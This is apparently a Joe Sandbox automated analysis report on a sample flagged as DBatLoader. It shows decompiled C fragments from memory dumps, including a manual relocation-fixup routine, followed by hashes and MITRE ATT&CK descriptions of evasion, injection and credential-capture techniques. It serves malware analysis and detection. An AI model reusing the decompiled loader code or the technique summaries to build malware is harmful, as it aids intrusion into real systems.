										 *((intOrPtr*)(_t80 - 8)) = _t170;
									}
									E032A1474(_t196, _t184, _t80);
									E032A1A8C(_t196, _t184);
									return _t80;
								}
							} else {
								_t86 = _t73 & 0xfffffff0;
								_t202 = _t154 + _t86;
								__eflags = __edx - _t202;
								if(__edx > _t202) {
									goto L51;
								} else {
									__eflags =  *0x32db04d;
									if(__eflags == 0) {
										L42:
										__eflags = _t86 - 0xb30;
										if(_t86 >= 0xb30) {
											E032A14C0(_t182);
											_t166 = _t166;
											_t154 = _t154;
										}
										asm("adc edi, 0xffffffff");
										_t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t173 = _t202 + 4 - _t94;
										__eflags = _t173;
										if(_t173 > 0) {
											 *(_t196 + _t202 - 4) = _t173;
											 *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3;
											_t203 = _t94;
											__eflags = _t173 - 0xb30;
											if(_t173 >= 0xb30) {
												__eflags = _t94 + _t196;
												E032A1500(_t94 + _t196, _t154, _t173);
											}
										} else {
											 *(_t196 + _t202) =  *(_t196 + _t202) & 0xfffffff7;
											_t203 = _t202 + 4;
										}
										_t204 = _t203 | _t136;
										__eflags = _t204;
										 *(_t196 - 4) = _t204;
										 *0x32db718 = 0;
										_t80 = _t196;
										L49:
										return _t80;
									} else {
										while(1) {
											asm("lock cmpxchg [0x32db718], ah");
											if(__eflags == 0) {
												break;
											}
											Sleep(0);
											_t166 = _t166;
											_t154 = _t154;
											asm("lock cmpxchg [0x32db718], ah");
											if(__eflags != 0) {
												Sleep(0xa);
												_t166 = _t166;
												_t154 = _t154;
												continue;
											}
											break;
										}
										_t136 = 0x0000000f &  *(_t196 - 4);
										_t100 =  *(_t182 - 4);
										__eflags = _t100 & 0x00000001;
										if((_t100 & 0x00000001) == 0) {
											L50:
											 *0x32db718 = 0;
											goto L51;
										} else {
											_t86 = _t100 & 0xfffffff0;
											_t202 = _t154 + _t86;
											__eflags = _t166 - _t202;
											if(_t166 > _t202) {
												goto L50;
											} else {
												goto L42;
											}
										}
									}
								}
							}
						} else {
							_t205 = __edx + __edx;
							__eflags = _t205 - _t154;
							if(_t205 < _t154) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L19:
									_t16 = _t166 + 0xd3; // 0xbff
									_t208 = (_t16 & 0xffffff00) + 0x30;
									_t157 = _t154 + 4 - _t208;
									__eflags =  *0x32db04d;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x32db718], ah");
											if(__eflags == 0) {
												break;
											}
											Sleep(0);
											_t157 = _t157;
											asm("lock cmpxchg [0x32db718], ah");
											if(__eflags != 0) {
												Sleep(0xa);
												_t157 = _t157;
												continue;
											}
											break;
										}
										_t136 = 0x0000000f &  *(_t196 - 4);
										__eflags = 0xf;
									}
									 *(_t196 - 4) = _t136 | _t208;
									_t139 = _t157;
									_t174 =  *(_t182 - 4);
									__eflags = _t174 & 0x00000001;
									if((_t174 & 0x00000001) != 0) {
										_t102 = _t182;
										_t175 = _t174 & 0xfffffff0;
										_t139 = _t139 + _t175;
										_t182 = _t182 + _t175;
										__eflags = _t175 - 0xb30;
										if(_t175 >= 0xb30) {
											E032A14C0(_t102);
										}
									} else {
										 *(_t182 - 4) = _t174 | 0x00000008;
									}
									 *((intOrPtr*)(_t182 - 8)) = _t139;
									 *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3;
									__eflags = _t139 - 0xb30;
									if(_t139 >= 0xb30) {
										E032A1500(_t196 + _t208, _t157, _t139);
									}
									 *0x32db718 = 0;
									return _t196;
								} else {
									__eflags = _t205 - 0xb2c;
									if(_t205 < 0xb2c) {
										_t190 = __edx;
										_t111 = E032A1724(__edx);
										__eflags = _t111;
										if(_t111 != 0) {
											E032A14A4(_t196, _t190, _t111);
											E032A1A8C(_t196, _t190);
										}
										return _t111;
									} else {
										_t166 = 0xb2c;
										goto L19;
									}
								}
							} else {
								return __eax;
							}
						}
					}
				} else {
					_t141 =  *_t145;
					_t160 = ( *(_t141 + 2) & 0x0000ffff) - 4;
					if(_t160 < __edx) {
						_push(__edi);
						_t193 = __edx;
						asm("adc eax, 0xffffffff");
						_t119 = E032A1724((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx);
						__eflags = _t119;
						if(_t119 != 0) {
							__eflags = _t193 - 0x40a2c;
							if(_t193 > 0x40a2c) {
								 *((intOrPtr*)(_t119 - 8)) = _t193;
							}
							__eflags = ( *(_t141 + 2) & 0x0000ffff) - 4;
							_t195 = _t119;
							 *((intOrPtr*)(_t141 + 0x1c))();
							E032A1A8C(_t196, _t195);
							_t119 = _t195;
						}
						return _t119;
					} else {
						if(0x40 + __edx * 4 < _t160) {
							_t143 = __edx;
							_t125 = E032A1724(__edx);
							__eflags = _t125;
							if(_t125 != 0) {
								E032A14A4(_t196, _t143, _t125);
								E032A1A8C(_t196, __edi);
								return _t125;
							}
							return _t125;
						} else {
							return __eax;
						}
					}
				}
			}

0x032a1c6c
0x032a1c6c
0x032a1c6c
0x032a1c74
0x032a1c76
0x032a1d04
0x032a1d07
0x032a1f58
0x032a1f5b
0x032a1fec
0x032a1ff0
0x032a1f61
0x032a1f61
0x032a1f64
0x032a1f66
0x032a1fae
0x032a1fb0
0x032a1fb8
0x032a1fbc
0x032a1fc1
0x032a1fc3
0x00000000
0x032a1fc5
0x032a1fc5
0x032a1fcb
0x032a1fcd
0x032a1fcd
0x032a1fd8
0x032a1fdf
0x032a1fe8
0x032a1fe8
0x032a1fb2
0x032a1fb2
0x032a1fb7
0x032a1fb7
0x032a1f68
0x032a1f73
0x032a1f7a
0x032a1f7c
0x032a1f7d
0x032a1f82
0x032a1f83
0x032a1f85
0x032a1f87
0x032a1f8d
0x032a1f8f
0x032a1f8f
0x032a1f9b
0x032a1fa2
0x00000000
0x032a1fa7
0x032a1fab
0x032a1fab
0x032a1fab
0x032a1f66
0x032a1d0d
0x032a1d0f
0x032a1d12
0x032a1d13
0x032a1d16
0x032a1d19
0x032a1d1c
0x032a1d1f
0x032a1e24
0x032a1e27
0x032a1e29
0x032a1f10
0x032a1f1b
0x032a1f22
0x032a1f24
0x032a1f27
0x032a1f2c
0x032a1f2d
0x032a1f2f
0x00000000
0x032a1f31
0x032a1f31
0x032a1f37
0x032a1f39
0x032a1f39
0x032a1f44
0x032a1f4b
0x032a1f56
0x032a1f56
0x032a1e2f
0x032a1e2f
0x032a1e32
0x032a1e35
0x032a1e37
0x00000000
0x032a1e3d
0x032a1e3d
0x032a1e44
0x032a1e95
0x032a1e95
0x032a1e9a
0x032a1ea0
0x032a1ea5
0x032a1ea6
0x032a1ea6
0x032a1eb2
0x032a1ec3
0x032a1ec9
0x032a1ec9
0x032a1ecb
0x032a1ed8
0x032a1edf
0x032a1ee3
0x032a1ee5
0x032a1eeb
0x032a1eed
0x032a1eef
0x032a1eef
0x032a1ecd
0x032a1ecd
0x032a1ed1
0x032a1ed1
0x032a1ef4
0x032a1ef4
0x032a1ef6
0x032a1ef9
0x032a1f00
0x032a1f02
0x032a1f06
0x032a1e46
0x032a1e46
0x032a1e4b
0x032a1e53
0x00000000
0x00000000
0x032a1e59
0x032a1e5e
0x032a1e5f
0x032a1e65
0x032a1e6d
0x032a1e73
0x032a1e78
0x032a1e79
0x00000000
0x032a1e79
0x00000000
0x032a1e6d
0x032a1e81
0x032a1e84
0x032a1e87
0x032a1e89
0x032a1f09
0x032a1f09
0x00000000
0x032a1e8b
0x032a1e8b
0x032a1e8e
0x032a1e91
0x032a1e93
0x00000000
0x00000000
0x00000000
0x00000000
0x032a1e93
0x032a1e89
0x032a1e44
0x032a1e37
0x032a1d25
0x032a1d25
0x032a1d28
0x032a1d2a
0x032a1d34
0x032a1d3a
0x032a1d4d
0x032a1d4d
0x032a1d59
0x032a1d5f
0x032a1d61
0x032a1d68
0x032a1d6a
0x032a1d6f
0x032a1d77
0x00000000
0x00000000
0x032a1d7c
0x032a1d81
0x032a1d87
0x032a1d8f
0x032a1d94
0x032a1d99
0x00000000
0x032a1d99
0x00000000
0x032a1d8f
0x032a1da1
0x032a1da1
0x032a1da1
0x032a1da6
0x032a1da9
0x032a1dab
0x032a1dae
0x032a1db1
0x032a1dbc
0x032a1dbe
0x032a1dc1
0x032a1dc3
0x032a1dc5
0x032a1dcb
0x032a1dcd
0x032a1dcd
0x032a1db3
0x032a1db6
0x032a1db6
0x032a1dd2
0x032a1dd8
0x032a1ddc
0x032a1de2
0x032a1de9
0x032a1de9
0x032a1dee
0x032a1dfb
0x032a1d3c
0x032a1d3c
0x032a1d42
0x032a1dfc
0x032a1e00
0x032a1e05
0x032a1e07
0x032a1e11
0x032a1e18
0x032a1e18
0x032a1e23
0x032a1d48
0x032a1d48
0x00000000
0x032a1d48
0x032a1d42
0x032a1d2c
0x032a1d30
0x032a1d30
0x032a1d2a
0x032a1d1f
0x032a1c7c
0x032a1c7c
0x032a1c82
0x032a1c87
0x032a1cc4
0x032a1cc5
0x032a1ccb
0x032a1cd2
0x032a1cd7
0x032a1cd9
0x032a1cdb
0x032a1ce1
0x032a1ce3
0x032a1ce3
0x032a1cea
0x032a1cef
0x032a1cf3
0x032a1cf8
0x032a1cfd
0x032a1cfd
0x032a1d02
0x032a1c89
0x032a1c92
0x032a1c98
0x032a1c9c
0x032a1ca1
0x032a1ca3
0x032a1cad
0x032a1cb4
0x00000000
0x032a1cb9
0x032a1cbd
0x032a1c96
0x032a1c96
0x032a1c96
0x032a1c92
0x032a1c87

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc56a1f7a65e0b9ef23ee000e7681e5ea4b2df3f374c5b313871f8e0f8066e6
Instruction ID: dddc4e3d1f663b13c858f0a8e32f87208d349d33017a2030c89ee5481714f051
Opcode Fuzzy Hash: ebc56a1f7a65e0b9ef23ee000e7681e5ea4b2df3f374c5b313871f8e0f8066e6
Instruction Fuzzy Hash: 8CA1D46B731F110BD718EA7C9D943ADB3C59B84371F1C827EE115CB385EBA4E9A18290

Uniqueness

Uniqueness Score: -1.00%

Function 032A94D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79
threadCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E032A94D0(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				intOrPtr _v284;
				char* _t34;
				intOrPtr* _t50;
				intOrPtr _t59;
				void* _t64;
				intOrPtr _t66;
				void* _t70;

				_v8 = 0;
				_t50 = __edx;
				_t64 = __eax;
				_push(_t70);
				_push(0x32a95be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70 + 0xfffffee8;
				E032A44A0(__edx);
				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
				if(_t64 > 2) {
					E032A4538( &_v8, 0x32a95e0);
				} else {
					E032A4538( &_v8, 0x32a95d4);
				}
				_t34 = E032A4964(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t34,  &_v280, 0x100) != 0) {
					E032A4710(_t50, 0x100,  &_v280);
					if(_t64 == 1 &&  *((char*)( *_t50)) == 0x30) {
						_v284 =  *_t50;
						_t66 = _v284;
						if(_t66 != 0) {
							_t66 =  *((intOrPtr*)(_t66 - 4));
						}
						E032A49C4( *_t50, _t66 - 1, 2, _t50);
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(E032A95C5);
				return E032A44A0( &_v8);
			}

0x032a94dd
0x032a94e0
0x032a94e2
0x032a94e6
0x032a94e7
0x032a94ec
0x032a94ef
0x032a94f4
0x032a9500
0x032a950b
0x032a9516
0x032a951d
0x032a9536
0x032a951f
0x032a9527
0x032a9527
0x032a954a
0x032a9563
0x032a9572
0x032a9578
0x032a9583
0x032a9589
0x032a9591
0x032a9596
0x032a9596
0x032a95a3
0x032a95a3
0x032a9578
0x032a95aa
0x032a95ad
0x032a95b0
0x032a95bd

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,032A95BE), ref: 032A9556
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,032A95BE), ref: 032A955C

Strings

yyyy, xrefs: 032A9531

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 67101a69ce9a40770c71382730c2f2f8b4f22fd7128577c5bb06abf38c124c2b
Instruction ID: a6365251f4083937f9f37e307c3f36faf600377b10a6e2a4736ac0507271feaf
Opcode Fuzzy Hash: 67101a69ce9a40770c71382730c2f2f8b4f22fd7128577c5bb06abf38c124c2b
Instruction Fuzzy Hash: 2A217175A24A1C9FCB14EF6EC841AAEB3A8EF48700F5500A5E904EB740D7B0DEC4C765

Uniqueness

Uniqueness Score: -1.00%

Function 032B2A2C Relevance: 5.1, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E032B2A2C(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				void* _t20;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x32b2b52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					__eflags = __eax - 0x100;
					if(__eax != 0x100) {
						__eflags = __eax - 0x101;
						if(__eax != 0x101) {
							_t20 = E032B2E88(__eax,  &_v8);
							__eflags = _t20;
							if(_t20 == 0) {
								E032A7A88( &_v524, 4);
								_t59 =  *0x32da958; // 0x32c9828
								E032A47B0(_t75, _v524,  *_t59);
							} else {
								E032A363C( *_v8,  &_v520);
								E032A2D7C( &_v520, 0x7fffffff, 2,  &_v264);
								E032A4704(__edx,  &_v264, __eflags);
							}
						} else {
							E032A44F4(__edx, 0x32b2b78);
						}
					} else {
						E032A44F4(__edx, "String");
					}
				} else {
					E032A44F4(__edx,  *((intOrPtr*)(0x32c9a2c + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E032A47B0(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E032A47B0(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(0x32b2b59);
				return E032A44A0( &_v524);
			}

0x032b2a3a
0x032b2a40
0x032b2a42
0x032b2a46
0x032b2a47
0x032b2a4c
0x032b2a4f
0x032b2a54
0x032b2a5d
0x032b2a75
0x032b2a7a
0x032b2a8d
0x032b2a92
0x032b2aa7
0x032b2aac
0x032b2aae
0x032b2af9
0x032b2b04
0x032b2b0e
0x032b2ab0
0x032b2ac2
0x032b2ad7
0x032b2ae4
0x032b2ae4
0x032b2a94
0x032b2a9b
0x032b2a9b
0x032b2a7c
0x032b2a83
0x032b2a83
0x032b2a5f
0x032b2a6b
0x032b2a6b
0x032b2b16
0x032b2b21
0x032b2b21
0x032b2b29
0x032b2b34
0x032b2b34
0x032b2b3b
0x032b2b3e
0x032b2b41
0x032b2b51

Strings

ByRef , xrefs: 032B2B2F
Any, xrefs: 032B2A96
Array , xrefs: 032B2B1C
String, xrefs: 032B2A7E

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID: Any$Array $ByRef $String
API String ID: 0-2719049652
Opcode ID: d6deed89d82ac3fb8e022c3899f4ae0a7c0ad2bcb8c85f0cac70b2b362232a24
Instruction ID: eaa35f0dea62d6e82163147f62b1cd4ffc40e1e0b9fb1dcb34be7dd0041e65e1
Opcode Fuzzy Hash: d6deed89d82ac3fb8e022c3899f4ae0a7c0ad2bcb8c85f0cac70b2b362232a24
Instruction Fuzzy Hash: 7B21E138730725CBC720FE18C940BE973B9EB88750F6489A6A6548B395DFF4DDC28691

Uniqueness

Uniqueness Score: -1.00%

Function 032BA4D0 Relevance: 5.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E032BA4D0(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				void* _v16;
				intOrPtr _v20;
				int _t22;
				void* _t36;
				void* _t43;
				void* _t45;
				void* _t46;

				_t43 = _a12;
				_v20 = _a16 - _a4;
				_t36 = _a12 + 8;
				while(1) {
					_t22 = IsBadReadPtr(_t43, 8);
					if(_t22 != 0) {
						break;
					}
					_t22 = IsBadReadPtr(_t36, 4);
					if(_t22 != 0) {
						break;
					}
					_t22 = _a12 + _a20;
					if(_t22 > _t43) {
						_v8 =  *((intOrPtr*)(_t43 + 4)) - 8 >> 1;
						_t45 = _v8 - 1;
						if(_t45 < 0) {
							L8:
							_t43 = _t36;
							_t36 = _t36 + 8;
							continue;
						}
						_t46 = _t45 + 1;
						do {
							if(IsBadReadPtr(_t36, 4) == 0 && ( *_t36 & 0x0000ffff ^ 0x00003000) < 0x1000) {
								_v16 = ( *_t36 & 0x0000ffff) % 0x3000 +  *_t43 + _a8;
								if(IsBadWritePtr(_v16, 4) == 0) {
									 *_v16 =  *_v16 + _v20;
								}
							}
							_t36 = _t36 + 2;
							_t46 = _t46 - 1;
						} while (_t46 != 0);
						goto L8;
					}
					break;
				}
				return _t22;
			}

0x032ba4d9
0x032ba4e2
0x032ba4e8
0x032ba550
0x032ba553
0x032ba55a
0x00000000
0x00000000
0x032ba55f
0x032ba566
0x00000000
0x00000000
0x032ba56b
0x032ba570
0x032ba4f5
0x032ba4fb
0x032ba4fe
0x032ba54b
0x032ba54b
0x032ba54d
0x00000000
0x032ba54d
0x032ba500
0x032ba501
0x032ba50b
0x032ba52b
0x032ba53b
0x032ba543
0x032ba543
0x032ba53b
0x032ba545
0x032ba548
0x032ba548
0x00000000
0x032ba501
0x00000000
0x032ba570
0x032ba57c

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 032BA504
IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 032BA534
IsBadReadPtr.KERNEL32(?,00000008), ref: 032BA553
IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 032BA55F

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: 6129f2bbfa62dbd872cdb4acd30af957bfb5020b3cc7e497b347e76894bc1354
Instruction ID: 3a9c0bc04e2da01335fad69b191542fb3ac9aa86b969e0f7565f669cd592f9ba
Opcode Fuzzy Hash: 6129f2bbfa62dbd872cdb4acd30af957bfb5020b3cc7e497b347e76894bc1354
Instruction Fuzzy Hash: F521B771A5071A9BDB20CF18CC80BDE7778EF80791F088555ED14A7344DB74E99187A0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report r096teIe1H.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

